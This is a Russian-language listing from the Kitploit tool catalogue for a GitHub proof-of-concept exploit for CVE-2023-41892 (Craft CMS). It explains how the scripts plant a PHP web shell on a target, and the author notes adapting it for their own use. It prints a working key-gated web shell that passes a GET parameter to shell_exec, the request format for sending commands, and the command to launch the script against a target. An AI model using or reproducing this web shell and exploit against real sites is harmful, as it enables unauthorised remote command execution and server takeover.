Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2023-41892_poc — Адаптировал это для собственного использования. | Kitploit
Инструменты/GitHubGitHub/user01-1/cve-2023-41892_poc
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияШелл-кодЭксплуатация веб-приложенийКомандование и Управление
GitHubuser01-1/cve-2023-41892_poc

CVE-2023-41892_poc

Адаптировал это для собственного использования.

Репозиторий
0 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2023-41892_poc

Адаптировано для собственного использования

poc_noauth.py

  • Базовый однострочный PHP-веб-шелл
  • Выполнение OS-команд через ?cmd=<명령어>

poc_auth.py

  • Веб-шелл с простой аутентификацией на основе ключа (сравнение SHA-256 хешей)
  • Выполнение команд возможно только после ввода корректного ключа
  • Требуется изменить код:
    • В переменной webshell внутри функции drop_payload замените YOUR_SECRET_KEY на SHA-256 хеш нужного ключа
  • Использование:
    1. В webshell замените YOUR_SECRET_KEY на SHA-256 хеш ключа в открытом виде (plaintext)
    2. При запросе передавайте ключ в открытом виде (plaintext)
      root@kitploit:~
      {target}/shell.php?k=<평문키>&c=<명령어>
      
  • Пример:
    1. Настройка: ключ в открытом виде (plaintext) = test1234
    2. Вычислите SHA256 хеш через cyberchef и т.п.: 937e8d5fbb48bd4949536cd65b8d35c426b80d2f830c5c308e2cdec422ae2244
      • echo -n test1234 | sha256sum
      • cyberchef и т.п.
    3. Измените код:
      root@kitploit:~
      webshell = """<?php const K='937e8d5fbb48bd4949536cd65b8d35c426b80d2f830c5c308e2cdec422ae2244';if(hash('sha256',$_GET['k']??'')!==K)die; if(isset($_GET['c']))echo'<pre>'.shell_exec($_GET['c']); ?>"""
      

Использование

python poc_noauth.py {타겟}

Скачать инструмент